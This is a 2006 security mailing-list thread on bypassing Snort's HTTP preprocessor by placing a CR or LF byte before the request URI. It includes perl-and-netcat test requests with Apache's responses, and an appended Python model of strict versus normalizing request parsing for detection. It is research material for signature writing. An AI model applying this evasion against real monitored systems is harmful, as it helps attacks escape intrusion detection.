Dailydave mailing list archives

Re: New Snort Bypass - Patch - Bypass of Patch


From: Sigint Consulting <info () sigint-consulting com>
Date: Sat, 03 Jun 2006 10:41:24 -0700

I performed this research while developing NFR's web signatures, and found
that all web servers I tested (several years ago) handled end-of-lines using
"\x0d\x0a" and "\x0a" interchangeably. If you find a web server that
interprets "index.php" in the example above as an actual filename, I for one
would be very interested in knowing about it.

Dodge


Apache 1.3.34 (debian package) returns index.html from my request as
normal even though the file name has a \x0d before it. So in Apache's
case it appears that the \x0d character will not mess up the request to
the webserver, at least in this case AND still bypasses the snort check.
Now obviously the \x90\x90 are going to ruin the request because no
such file exists by that name so they were left out of this example,
but this may mean the \x0d character would not mangle a real malicious
request to apache.

$ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Mon, 05 Jun 2006 07:25:47 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT
ETag: "6f9d3-4d-4481554a"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/html; charset=iso-8859-1

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. . 
$

Further research on the snort vulnerability reveals that the \x0a
character will also evade the snort preprocessor AND apache will return
a valid response. (Testing \x0a before a malicious Unicode string did
not generate a snort alert.)

$ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. .
$

Chris

--------------------------------
www.sigint-consulting.com
info () sigint-consulting com

Charlotte, North Carolina 
Information Security Consulting
--------------------------------
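An added example, not code from the thread: a small Python model of the gap the two requests above expose. It compares a strict request-line reader, which loses the URI when a CR or LF precedes the path, with a normalizer that reads the URI the way the lenient server served it and also flags that CR/LF bytes had to be stripped. The sample requests, the watched URI and the lenient-parse regex are constructed assumptions, not Apache's actual parsing logic.

```python
import re
from typing import NamedTuple

# Constructed sample requests, modelled on the ones in the thread: a clean
# request line and two with a stray CR or LF before the path, which the
# Apache 1.3.34 instance in the thread still answered with index.html.
SAMPLE_REQUESTS = {
    "clean": b"GET /index.html HTTP/1.0\n\r\n",
    "cr":    b"GET \x0d/index.html HTTP/1.0\n\r\n",
    "lf":    b"GET \x0a/index.html HTTP/1.0\n\r\n",
}
WATCHED_URI = b"/index.html"   # constructed stand-in for a URI content rule

class Normalized(NamedTuple):
    uri: bytes       # URI with embedded CR/LF removed
    anomalous: bool  # True when CR/LF had to be stripped from the request line

# Model of a lenient server's request line (an assumption, not Apache's
# parser): CRLF and bare LF both end the line, and the URI field is whatever
# sits between the method and the HTTP-version token, CR/LF bytes included.
_REQUEST_LINE = re.compile(rb"^([A-Z]+)[ \t]+(.*?)[ \t]+HTTP/\d\.\d\r?\n", re.DOTALL)

def strict_uri(request: bytes) -> bytes:
    """URI as a line-oriented reader sees it: the request line ends at the
    first LF and the URI is the second space-separated token. A stray CR or
    LF before the path leaves this reader with a URI that no longer matches."""
    fields = request.split(b"\n", 1)[0].rstrip(b"\r").split(b" ")
    return fields[1] if len(fields) >= 2 else b""

def normalized_uri(request: bytes) -> Normalized:
    """URI as the lenient server would serve it, plus a flag telling the
    analyst that CR/LF bytes were dropped to get there (worth alerting on
    by itself, since a conforming client never puts them in a request line)."""
    m = _REQUEST_LINE.match(request)
    if not m:
        return Normalized(b"", False)
    raw = m.group(2)
    cleaned = raw.replace(b"\r", b"").replace(b"\n", b"")
    return Normalized(cleaned, cleaned != raw)

def strict_match(request: bytes) -> bool:
    """Rule check on the strictly parsed URI: evaded by the CR and LF variants."""
    return strict_uri(request) == WATCHED_URI

def normalized_match(request: bytes) -> bool:
    """Rule check on the normalized URI: fires on all three variants."""
    return normalized_uri(request).uri == WATCHED_URI
```

Running `normalized_match` and `strict_match` over `SAMPLE_REQUESTS` shows the strict check firing only on the clean request while the normalized check fires on all three and marks the two altered ones as anomalous.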

